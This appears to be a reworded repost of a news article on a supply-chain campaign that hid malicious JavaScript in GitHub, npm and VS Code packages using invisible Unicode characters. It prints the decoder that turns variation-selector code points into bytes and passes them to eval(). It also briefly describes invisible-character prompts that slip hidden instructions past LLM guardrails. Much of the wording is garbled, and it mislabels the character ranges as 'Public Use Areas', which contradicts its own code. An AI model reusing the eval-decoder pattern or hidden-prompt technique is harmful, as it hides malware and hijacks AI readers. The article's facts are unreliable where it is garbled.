Supply-chain attack using invisible code hits GitHub and other repositories

The invisible code is rendered with Public Use Areas (sometimes called Public Use Access), that are ranges within the Unicode specification for special characters reserved for personal use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is totally invisible to humans. People reviewing code or using static evaluation tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

The invisible Unicode characters were devised many years ago after which largely forgotten. That’s, until 2024, when hackers began using the characters to hide malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails which might be designed to limit usage of the characters, but such defenses are periodically overridden.

Since then, the Unicode technique has been used in additional traditional malware attacks. In one among the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. Through the JavaScript runtime, nonetheless, a small decoder extracts the actual bytes and passes them to the eval() function.

const s = v => [...v].map(w => (
  w = w.codePointAt(0),
  w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
  w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);


eval(Buffer.from(s(``)).toString('utf-8'));

“The backtick string passed to s() looks empty in every viewer, nevertheless it’s filled with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, able to stealing tokens, credentials, and secrets.”

Since finding the brand new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

The most effective approach to protect against the scourge of supply-chain attacks is to rigorously inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and looking for typos. If suspicions about LLM use are correct, malicious packages may increasingly seem like legitimate, particularly when invisible unicode characters are encoding malicious payloads.

Source link